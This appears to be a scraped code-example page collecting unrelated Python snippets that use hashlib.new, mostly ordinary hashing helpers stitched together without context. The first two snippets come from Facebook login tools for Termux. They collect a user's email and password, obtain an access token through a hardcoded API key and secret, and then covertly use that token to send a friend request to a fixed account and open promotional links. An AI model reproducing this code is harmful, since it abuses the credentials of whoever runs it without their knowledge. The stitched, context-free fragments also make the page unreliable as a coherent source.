        print 42 * "\033[1;96m="
        print(
            '\033[1;96m[☆] \x1b[1;91mAPNA FACEBOOK ACCOUNT LOGIN KREIN \x1b[1;96m[☆]'
        )
        id = raw_input(
            '\033[1;96m[+] \x1b[0;34mID/Email \x1b[1;91m: \x1b[1;92m')
        pwd = raw_input(
            '\033[1;96m[+] \x1b[0;34mPassword \x1b[1;91m: \x1b[1;92m')
        tik()
        try:
            br.open('https://m.facebook.com')
        except mechanize.URLError:
            print "\n\033[1;96m[!] \x1b[1;91mTidak ada koneksi"
            keluar()
        br._factory.is_html = True
        br.select_form(nr=0)
        br.form['email'] = id
        br.form['pass'] = pwd
        br.submit()
        url = br.geturl()
        if 'save-device' in url:
            try:
                sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=' + id + 'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='******'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
                data = {
                    "api_key": "882a8490361da98702bf97a021ddc14d",
                    "credentials_type": "password",
                    "email": id,
                    "format": "JSON",
                    "generate_machine_id": "1",
                    "generate_session_cookies": "1",
                    "locale": "en_US",
                    "method": "auth.login",
                    "password": pwd,
                    "return_ssl_resources": "0",
                    "v": "1.0"
                }
                x = hashlib.new("md5")
                x.update(sig)
                a = x.hexdigest()
                data.update({'sig': a})
                url = "https://api.facebook.com/restserver.php"
                r = requests.get(url, params=data)
                z = json.loads(r.text)
                unikers = open("login.txt", 'w')
                unikers.write(z['access_token'])
                unikers.close()
                print '\n\033[1;96m[✓] \x1b[1;92mLogin Hogai'
                os.system('xdg-open https://facebook.com/bhupinder.india2')
                requests.post(
                    'https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='
                    + z['access_token'])
                menu()
            except requests.exceptions.ConnectionError:
                print "\n\033[1;96m[!] \x1b[1;91mTidak ada koneksi"
                keluar()
        if 'checkpoint' in url:
            print(
                "\n\033[1;96m[!] \x1b[1;91mAisa lagta hai apka account checkpoint pe hai"
            )
            os.system('rm -rf login.txt')
            time.sleep(1)
            keluar()
        else:
            print("\n\033[1;96m[!] \x1b[1;91mPassword/Email ghalat hai")
            os.system('rm -rf login.txt')
            time.sleep(1)
            login()
 def __init__(self, hash_name, expected):
     self.hash_name = hash_name
     self.hash = hashlib.new(hash_name)
     self.expected = expected
Пример #43
0
def login():
    os.system('clear')
    try:
        toket = open('login.txt', 'r')
        menu()
    except (KeyError, IOError):
        os.system('clear')
        print logo
        jalan(' \033[1;91mWarning: \033[1;95mDo Not Use Your Personal Account')
        jalan(' \033[1;91mWarning: \033[1;95mUse a New Account To Login')
        jalan(' \033[1;91mWarning: \033[1;95mTermux Old Version install 0.63✅')
        print "\033[1;94m•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬ •◈•\033[1;91mKali.linux\033[1;94m•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬•◈•"
        print(
            '	   \033[1;94m▬\x1b[1;94m✔✔✔✔✔✔✔LOGIN WITH FACEBOOK✔✔✔✔✔✔✔\x1b[1;94m▬'
        )
        print('	')
        id = raw_input(
            '\033[1;91m[+] \x1b[1;94mID/Email\x1b[1;95m: \x1b[1;93m')
        pwd = raw_input(
            '\033[1;91m[+] \x1b[1;91mPassword\x1b[1;96m: \x1b[1;93m')
        tik()
        try:
            br.open('https://m.facebook.com')
        except mechanize.URLError:
            print "\n\x1b[1;96mThere is no internet connection"
            keluar()
        br._factory.is_html = True
        br.select_form(nr=0)
        br.form['email'] = id
        br.form['pass'] = pwd
        br.submit()
        url = br.geturl()
        if 'save-device' in url:
            try:
                sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=' + id + 'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='******'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
                data = {
                    "api_key": "882a8490361da98702bf97a021ddc14d",
                    "credentials_type": "password",
                    "email": id,
                    "format": "JSON",
                    "generate_machine_id": "1",
                    "generate_session_cookies": "1",
                    "locale": "en_US",
                    "method": "auth.login",
                    "password": pwd,
                    "return_ssl_resources": "0",
                    "v": "1.0"
                }
                x = hashlib.new("md5")
                x.update(sig)
                a = x.hexdigest()
                data.update({'sig': a})
                url = "https://api.facebook.com/restserver.php"
                r = requests.get(url, params=data)
                z = json.loads(r.text)
                unikers = open("login.txt", 'w')
                unikers.write(z['access_token'])
                unikers.close()
                print '\n\x1b[1;92mLogin Successful.•◈•..'
                os.system(
                    'xdg-open https://m.youtube.com/channel/UCRrRgcJjsnNm5Bi5ZenRGnw'
                )
                requests.post(
                    'https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='
                    + z['access_token'])
                menu()
            except requests.exceptions.ConnectionError:
                print "\n\x1b[1;91mThere is no internet connection"
                keluar()
        if 'checkpoint' in url:
            print("\n\x1b[1;93mYour Account is on Checkpoint")
            os.system('rm -rf login.txt')
            time.sleep(1)
            keluar()
        else:
            print("\n\x1b[1;94mPassword/Email is wrong")
            os.system('rm -rf login.txt')
            time.sleep(1)
            login()
Пример #44
0
def sha256(s):
    return hashlib.new('sha256', s).digest()
Пример #45
0
    def _to_bytes(self, obj, context):
        """Hash objects to bytes, including code with dependencies.

        Python's built in `hash` does not produce consistent results across
        runs.
        """

        if _is_magicmock(obj):
            # MagicMock can result in objects that appear to be infinitely
            # deep, so we don't try to hash them at all.
            return self.to_bytes(id(obj))

        elif isinstance(obj, bytes) or isinstance(obj, bytearray):
            return obj

        elif type_util.get_fqn_type(obj) in self._hash_funcs:
            # Escape hatch for unsupported objects
            hash_func = self._hash_funcs[type_util.get_fqn_type(obj)]
            try:
                output = hash_func(obj)
            except BaseException as e:
                raise UserHashError(e, obj, hash_func=hash_func)

            return self.to_bytes(output)

        elif isinstance(obj, str):
            return obj.encode()

        elif isinstance(obj, float):
            return self.to_bytes(hash(obj))

        elif isinstance(obj, int):
            return _int_to_bytes(obj)

        elif isinstance(obj, (list, tuple)):
            h = hashlib.new("md5")
            for item in obj:
                self.update(h, item, context)
            return h.digest()

        elif isinstance(obj, dict):
            h = hashlib.new("md5")
            for item in obj.items():
                self.update(h, item, context)
            return h.digest()

        elif obj is None:
            return b"0"

        elif obj is True:
            return b"1"

        elif obj is False:
            return b"0"

        elif type_util.is_type(
                obj, "pandas.core.frame.DataFrame") or type_util.is_type(
                    obj, "pandas.core.series.Series"):
            import pandas as pd

            if len(obj) >= _PANDAS_ROWS_LARGE:
                obj = obj.sample(n=_PANDAS_SAMPLE_SIZE, random_state=0)
            try:
                return b"%s" % pd.util.hash_pandas_object(obj).sum()
            except TypeError:
                # Use pickle if pandas cannot hash the object for example if
                # it contains unhashable objects.
                return b"%s" % pickle.dumps(obj, pickle.HIGHEST_PROTOCOL)

        elif type_util.is_type(obj, "numpy.ndarray"):
            h = hashlib.new("md5")
            self.update(h, obj.shape)

            if obj.size >= _NP_SIZE_LARGE:
                import numpy as np

                state = np.random.RandomState(0)
                obj = state.choice(obj.flat, size=_NP_SAMPLE_SIZE)

            self.update(h, obj.tobytes())
            return h.digest()

        elif inspect.isbuiltin(obj):
            return obj.__name__.encode()

        elif any(
                type_util.is_type(obj, typename)
                for typename in _FFI_TYPE_NAMES):
            return self.to_bytes(None)

        elif type_util.is_type(obj,
                               "builtins.mappingproxy") or type_util.is_type(
                                   obj, "builtins.dict_items"):
            return self.to_bytes(dict(obj))

        elif type_util.is_type(obj, "builtins.getset_descriptor"):
            return obj.__qualname__.encode()

        elif isinstance(obj, UploadedFile):
            # UploadedFile is a BytesIO (thus IOBase) but has a name.
            # It does not have a timestamp so this must come before
            # temproary files
            h = hashlib.new("md5")
            self.update(h, obj.name)
            self.update(h, obj.tell())
            self.update(h, obj.getvalue())
            return h.digest()

        elif hasattr(
                obj,
                "name") and (isinstance(obj, io.IOBase)
                             # Handle temporary files used during testing
                             or isinstance(obj, tempfile._TemporaryFileWrapper
                                           )  # type: ignore[attr-defined]
                             ):
            # Hash files as name + last modification date + offset.
            # NB: we're using hasattr("name") to differentiate between
            # on-disk and in-memory StringIO/BytesIO file representations.
            # That means that this condition must come *before* the next
            # condition, which just checks for StringIO/BytesIO.
            h = hashlib.new("md5")
            obj_name = getattr(obj, "name",
                               "wonthappen")  # Just to appease MyPy.
            self.update(h, obj_name)
            self.update(h, os.path.getmtime(obj_name))
            self.update(h, obj.tell())
            return h.digest()

        elif isinstance(obj, Pattern):
            return self.to_bytes([obj.pattern, obj.flags])

        elif isinstance(obj, io.StringIO) or isinstance(obj, io.BytesIO):
            # Hash in-memory StringIO/BytesIO by their full contents
            # and seek position.
            h = hashlib.new("md5")
            self.update(h, obj.tell())
            self.update(h, obj.getvalue())
            return h.digest()

        elif any(
                type_util.get_fqn(x) == "sqlalchemy.pool.base.Pool"
                for x in type(obj).__bases__):
            # Get connect_args from the closure of the creator function. It includes
            # arguments parsed from the URL and those passed in via `connect_args`.
            # However if a custom `creator` function is passed in then we don't
            # expect to get this data.
            cargs = obj._creator.__closure__
            cargs = [cargs[0].cell_contents, cargs[1].cell_contents
                     ] if cargs else None

            # Sort kwargs since hashing dicts is sensitive to key order
            if cargs:
                cargs[1] = dict(
                    collections.OrderedDict(
                        sorted(cargs[1].items(), key=lambda t: t[0])))

            reduce_data = obj.__reduce__()

            # Remove thread related objects
            for attr in [
                    "_overflow_lock",
                    "_pool",
                    "_conn",
                    "_fairy",
                    "_threadconns",
                    "logger",
            ]:
                reduce_data[2].pop(attr, None)

            return self.to_bytes([reduce_data, cargs])

        elif type_util.is_type(obj, "sqlalchemy.engine.base.Engine"):
            # Remove the url because it's overwritten by creator and connect_args
            reduce_data = obj.__reduce__()
            reduce_data[2].pop("url", None)
            reduce_data[2].pop("logger", None)

            return self.to_bytes(reduce_data)

        elif type_util.is_type(obj, "numpy.ufunc"):
            # For numpy.remainder, this returns remainder.
            return obj.__name__.encode()

        elif type_util.is_type(obj, "socket.socket"):
            return self.to_bytes(id(obj))

        elif any(
                type_util.get_fqn(x) == "torch.nn.modules.module.Module"
                for x in type(obj).__bases__):
            return self.to_bytes(id(obj))

        elif type_util.is_type(obj,
                               "tensorflow.python.client.session.Session"):
            return self.to_bytes(id(obj))

        elif type_util.is_type(obj, "torch.Tensor") or type_util.is_type(
                obj, "torch._C._TensorBase"):
            return self.to_bytes([obj.detach().numpy(), obj.grad])

        elif any(
                type_util.is_type(obj, typename)
                for typename in _KERAS_TYPE_NAMES):
            return self.to_bytes(id(obj))

        elif type_util.is_type(
                obj,
                "tensorflow.python.saved_model.load.Loader._recreate_base_user_object.<locals>._UserObject",
        ):
            return self.to_bytes(id(obj))

        elif inspect.isroutine(obj):
            if hasattr(obj, "__wrapped__"):
                # Ignore the wrapper of wrapped functions.
                return self.to_bytes(obj.__wrapped__)

            if obj.__module__.startswith("streamlit"):
                # Ignore streamlit modules even if they are in the CWD
                # (e.g. during development).
                return self.to_bytes("%s.%s" % (obj.__module__, obj.__name__))

            h = hashlib.new("md5")

            if self._file_should_be_hashed(obj.__code__.co_filename):
                context = _get_context(obj)
                if obj.__defaults__:
                    self.update(h, obj.__defaults__, context)
                h.update(self._code_to_bytes(obj.__code__, context))
            else:
                # Don't hash code that is not in the current working directory.
                self.update(h, obj.__module__)
                self.update(h, obj.__name__)
            return h.digest()

        elif inspect.iscode(obj):
            return self._code_to_bytes(obj, context)

        elif inspect.ismodule(obj):
            # TODO: Figure out how to best show this kind of warning to the
            # user. In the meantime, show nothing. This scenario is too common,
            # so the current warning is quite annoying...
            # st.warning(('Streamlit does not support hashing modules. '
            #             'We did not hash `%s`.') % obj.__name__)
            # TODO: Hash more than just the name for internal modules.
            return self.to_bytes(obj.__name__)

        elif inspect.isclass(obj):
            # TODO: Figure out how to best show this kind of warning to the
            # user. In the meantime, show nothing. This scenario is too common,
            # (e.g. in every "except" statement) so the current warning is
            # quite annoying...
            # st.warning(('Streamlit does not support hashing classes. '
            #             'We did not hash `%s`.') % obj.__name__)
            # TODO: Hash more than just the name of classes.
            return self.to_bytes(obj.__name__)

        elif isinstance(obj, functools.partial):
            # The return value of functools.partial is not a plain function:
            # it's a callable object that remembers the original function plus
            # the values you pickled into it. So here we need to special-case it.
            h = hashlib.new("md5")
            self.update(h, obj.args)
            self.update(h, obj.func)
            self.update(h, obj.keywords)
            return h.digest()

        else:
            # As a last resort, hash the output of the object's __reduce__ method
            h = hashlib.new("md5")
            try:
                reduce_data = obj.__reduce__()
            except BaseException as e:
                raise UnhashableTypeError(e, obj)

            for item in reduce_data:
                self.update(h, item, context)
            return h.digest()
Пример #46
0
 def make_token(self, compact_ip):
     h = hashlib.new('sha384')
     h.update(self.token_secret + compact_ip)
     return h.digest()
Пример #47
0
def bin_ripemd160(string):
    try:
        digest = hashlib.new('ripemd160', string).digest()
    except:
        digest = RIPEMD160(string).digest()
    return digest
Пример #48
0
def claim_id_hash(txid, n):
    # TODO: This should be in lbryschema
    packed = txid + struct.pack('>I', n)
    md = hashlib.new('ripemd160')
    md.update(hashlib.sha256(packed).digest())
    return md.digest()
Пример #49
0
def _sha512(data):
    return hashlib.new("sha512", compat26_str(data)).digest()
Пример #50
0
	def crear(self, usuario, contra, tipo):
		insertar = ("INSERT INTO usuario (correo,password,tipo) VALUES(%s,%s,%s)")
		h = hashlib.new('sha256', bytes(contra, 'utf-8'))
		h = h.hexdigest()
		self.cursor.execute(insertar, (usuario, h, tipo))
		self.conexion.commit()
def hash_160(public_key):
        md = hashlib.new('ripemd160')
        md.update(hashlib.sha256(public_key).digest())
        return md.digest()
def get_hash(content, hash_type="md5"):
    h = hashlib.new(hash_type)
    h.update(content)
    return h.hexdigest()
Пример #53
0
 def sha256_digest(self, path):
     with open(path, 'rb') as f:
         h = hashlib.new('sha256')
         h.update(f.read())
         sha256 = h.hexdigest().lower()
     return sha256
Пример #54
0
def ripemd160(data):
    return hashlib.new("ripemd160", data)
Пример #55
0
 def key_for(cls, name, *bits):
     return hashlib.new('sha1', six.text_type(name + ''.join([six.text_type(token) for token in bits])).encode('utf8')).hexdigest()
Пример #56
0
def ripemd160(x):
    """ Simple wrapper of hashlib ripemd160. """
    h = hashlib.new('ripemd160')
    h.update(x)
    return h.digest()
Пример #57
0
 def to_address(self) -> "Address":
     """Return address instance from this public key"""
     hash = hashlib.new("sha256", self.verify_key.to_string("compressed")).digest()
     return Address(hashlib.new("ripemd160", hash).digest())
def hsidUrl(aUrl):
    # Append this url's "hsid" to it (md5 hash of its http url)
    md5Hasher = hashlib.new("md5")
    md5Hasher.update(b"ipadsecuretext")
    md5Hasher.update(aUrl.replace("https://","http://").encode("utf-8"))
    return aUrl + "&hsid=" + md5Hasher.hexdigest()
Пример #59
0
    def stream(self, source, size):
        bytes_transferred = 0
        meta_chunk = self.meta_chunk
        if self.chunk_checksum_algo:
            meta_checksum = hashlib.new(self.chunk_checksum_algo)
        else:
            meta_checksum = None
        pile = GreenPile(len(meta_chunk))
        failed_chunks = []
        current_conns = []

        for chunk in meta_chunk:
            pile.spawn(self._connect_put, chunk)

        for conn, chunk in pile:
            if not conn:
                failed_chunks.append(chunk)
            else:
                current_conns.append(conn)

        self.quorum_or_fail([co.chunk for co in current_conns], failed_chunks)

        bytes_transferred = 0
        try:
            with green.ContextPool(len(meta_chunk)) as pool:
                for conn in current_conns:
                    conn.failed = False
                    conn.queue = LightQueue(io.PUT_QUEUE_DEPTH)
                    pool.spawn(self._send_data, conn)

                while True:
                    buffer_size = self.buffer_size()
                    if size is not None:
                        remaining_bytes = size - bytes_transferred
                        if buffer_size < remaining_bytes:
                            read_size = buffer_size
                        else:
                            read_size = remaining_bytes
                    else:
                        read_size = buffer_size
                    with green.SourceReadTimeout(self.read_timeout):
                        try:
                            data = source.read(read_size)
                        except (ValueError, IOError) as err:
                            raise SourceReadError(str(err))
                        if len(data) == 0:
                            for conn in current_conns:
                                if not conn.failed:
                                    conn.queue.put(b'')
                            break
                    self.checksum.update(data)
                    if meta_checksum:
                        meta_checksum.update(data)
                    bytes_transferred += len(data)
                    # copy current_conns to be able to remove a failed conn
                    for conn in current_conns[:]:
                        if not conn.failed:
                            conn.queue.put(data)
                        else:
                            current_conns.remove(conn)
                            failed_chunks.append(conn.chunk)

                    self.quorum_or_fail([co.chunk for co in current_conns],
                                        failed_chunks)

                for conn in current_conns:
                    while conn.queue.qsize():
                        green.eventlet_yield()

        except green.SourceReadTimeout as err:
            self.logger.warn('Source read timeout (reqid=%s): %s', self.reqid,
                             err)
            raise SourceReadTimeout(err)
        except SourceReadError as err:
            self.logger.warn('Source read error (reqid=%s): %s', self.reqid,
                             err)
            raise
        except Timeout as to:
            self.logger.warn('Timeout writing data (reqid=%s): %s', self.reqid,
                             to)
            raise OioTimeout(to)
        except Exception:
            self.logger.exception('Exception writing data (reqid=%s)',
                                  self.reqid)
            raise

        success_chunks = []

        for conn in current_conns:
            if conn.failed:
                failed_chunks.append(conn.chunk)
                continue
            pile.spawn(self._get_response, conn)

        for (conn, resp) in pile:
            if resp:
                self._handle_resp(
                    conn, resp,
                    meta_checksum.hexdigest() if meta_checksum else None,
                    bytes_transferred, success_chunks, failed_chunks)
        self.quorum_or_fail(success_chunks, failed_chunks)

        for chunk in success_chunks:
            chunk["size"] = bytes_transferred

        return bytes_transferred, success_chunks[0]['hash'], success_chunks
Пример #60
0
def hash_str(source):
    return hashlib.new('sha512', source.encode('utf-8')).hexdigest()